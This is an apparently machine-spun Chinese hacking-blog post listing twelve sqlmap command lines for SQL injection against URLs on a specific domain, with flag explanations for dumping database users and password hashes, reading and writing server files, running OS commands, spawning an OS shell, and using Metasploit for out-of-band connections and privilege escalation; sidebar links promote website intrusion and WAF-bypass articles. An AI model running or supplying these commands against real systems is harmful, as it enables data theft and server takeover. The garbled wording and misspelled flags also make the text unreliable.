Sqlmap引入操作 ***

hacker5年前 (2020-06-02)黑客文章875

坚信许多都了解Sqlmap，可是却不清楚怎样根据sqlmap来引入对不对？

今日将实战演练教大伙儿怎样真实的应用sqlmap来引入？要是了解这12种方式，包你只必须应用Sqlmap这一个专用工具把握这12种使用 *** 就能打遍天下打遍天下；

Sqlmap引入操作 *** 1：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0

-u 总体目标详细地址

-f 普遍指纹识别后端开发DBMS

-b 查找DBMS条幅

--current-user 查找当今对话客户

--current-db 查找当今数据库查询

--users 枚举类型数据库查询客户

--passwords 枚举类型数据库查询客户登陆密码散列

--dbs 枚举类型能用的数据库查询

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 2：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 -b --passwords -U CU --union-use -v 2

-u 总体目标详细地址

-b 查找DBMS条幅

--passwords 枚举类型数据库查询客户登陆密码散列

-U 特定数据库查询客户（cu，当今客户的别称）

--unlon-use 假如将会，根据联合查询sql注入查找数据信息

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 3：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_str2.asp?name=fujieace --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2

-u 总体目标详细地址

--dump 复印表项

-T 复印表（users）

-C 复印列（surname）

--start 之一个项键入（2，第二个报表顶端）

--stop 最终一项键入（3，第三个报表顶端）

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入应用 *** 4：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --dump -C 'user.pass' -v 1 --exclude-sysdbs

-u 总体目标详细地址

--dump 复印表项

-C 复印列（user.pass）

-v VERBOSE 详尽水平级別：0-6（初始值1）

--exclude-sysdbs lgnore系统软件数据库查询（e.g.information_schema）

留意：沒有出示table名（-T选择项）

Sqlmap引入操作 *** 5：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 --sql-shell -v 2

-u 总体目标详细地址

--sql-shell 造成一个互动式的sql shell

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 6：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --read-file "c:\example.txt" -v 2

-u 总体目标详细地址

--read-file 文档以从更底层系统文件载入

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 7：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2

-u 总体目标详细地址

--write-file 上传文件到更底层系统文件（/ etc / passwd）

--dest-file 肯定系统文件相对路径载入（/ tmp / writetest）

-v VERBOSE 详尽水平级別：0-6（初始值1）

< p>

Sqlmap引入操作 *** 8：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --os-cmd "id" -v 1

-u 总体目标详细地址

--os-cmd 电脑操作系统指令实行（id）

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 9：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.aspx?id=1 --os-shell -v 1 --union-use

-u 总体目标详细地址

--os-shell 转化成互动式命令提示符

---union-usea 假如将会得话，根据联合查询SQL引入应用petrieve数据信息

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 10：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/iis/get_int.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

-u 总体目标详细地址

--os-pwn 创建客户和数据库查询集群服务器的带外连接

--msf-path metasploit系统文件相对路径（/home/inquis/software/metasploit）

--prive-esc 试着将数据库查询过程的用户权限提高到系统软件

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 11：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

-u 总体目标详细地址

--os-pwn 创建客户和数据库查询集群服务器的带外连接

--msf-path metasploit系统文件相对路径（/home/inquis/software/metasploit）

-v VERBOSE 详尽水平级別：0-6（初始值1）

Sqlmap引入操作 *** 12：

python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --os-bof -v 1 --mst-path ~/software/metasploit

-u 总体目标详细地址

--os-bof 根据运用微软公司sql *** 服务器跨站脚本攻击（MS09-04）创建客户和数据库查询集群服务器的带外连接，

--msf-path metasploit系统文件相对路径（/home/inquis/software/metasploit）

-v VERBOSE 详尽水平级別：0-6（初始值1）

标签: 黑客技术

返回列表

上一篇：JohnRipper是“最后的”登陆密码黑客工具!专用工

下一篇：我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

Etherape是完全免费的吗?

什么叫Etherape？ Etherape是以太网接口仿真模拟的图型网络监视器。它具备以图型方法显示信息互联网主题活动的IP，TCP和链路层方式。连接和服务器的尺寸随总流量而转变。它还具备颜色编码协...

Hping的典型性主要用途是啥?

什么叫Hping？ Hping是网站渗透测试工作人员和IT安全性质量监督员应用的火爆的数据文件解决专用工具。Hping实质上是一个朝向cmd的TCP / IP数据文件汇编器和解析器。该专用工具适用各...

入侵指定网站常用的几种方法

首先，观察指定网站。入侵指定网站是需要条件的：要先观察这个网站是动态还是静态的。首先介绍下什么样站点可以入侵：我认为必须是动态的网站如ASP、PHP、 JSP等代码编写的站点如果是静态的...

有那么多tamper脚本制作,Linux时该怎么才能找到合适

很多状况下我们可以根据应用sqlmap中的tamper脚本制作来对总体目标开展更高效率的进攻。tamper脚本制作的功效是改动大家传出的恳求来避免其被WAF（网络技术应用服务器防火墙）阻拦。在一些状...

Nexpose许可证书密匙key能够数次应用吗?

许多情况下我们在windows上安裝了Nexpose，可是都会碰到那样或那般的难题，我是一样的，我将我所碰到的难题小结出去共享给各位朋友们！难题1、浏览 https://localh...

cURLCyber随意吗?

什么叫cURL Cyber？ Curl是一个命令行工具，作为应用URL英语的语法传送数据的库。该专用工具适用多种多样协议书，包含但不限于：FILE，DICT，FTP，FTPS，HTTP，HTTPS，...

找黑客平台

Sqlmap引入操作 ***

Sqlmap引入操作 *** 1：

Sqlmap引入操作 *** 2：

Sqlmap引入操作 *** 3：

Sqlmap引入应用 *** 4：

Sqlmap引入操作 *** 5：

Sqlmap引入操作 *** 6：

Sqlmap引入操作 *** 7：

Sqlmap引入操作 *** 8：

Sqlmap引入操作 *** 9：

Sqlmap引入操作 *** 10：

Sqlmap引入操作 *** 11：

Sqlmap引入操作 *** 12：

相关文章

Etherape是完全免费的吗?

Hping的典型性主要用途是啥?

入侵指定网站常用的几种方法

有那么多tamper脚本制作,Linux时该怎么才能找到合适

Nexpose许可证书密匙key能够数次应用吗?

cURLCyber随意吗?

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.

找黑客平台

Sqlmap引入操作 ***

Sqlmap引入操作 *** 1：

Sqlmap引入操作 *** 2：

Sqlmap引入操作 *** 3：

Sqlmap引入应用 *** 4：

Sqlmap引入操作 *** 5：

Sqlmap引入操作 *** 6：

Sqlmap引入操作 *** 7：

Sqlmap引入操作 *** 8：

Sqlmap引入操作 *** 9：

Sqlmap引入操作 *** 10：

Sqlmap引入操作 *** 11：

Sqlmap引入操作 *** 12：

相关文章

Etherape是完全免费的吗?

Hping的典型性主要用途是啥?

入侵指定网站 常用的几种方法

有那么多tamper脚本制作,Linux时该怎么才能找到合适

Nexpose许可证书密匙key能够数次应用吗?

cURLCyber随意吗?

Copyright Your WebSite.Some Rights Reserved.

Hacker by Hacker.

入侵指定网站常用的几种方法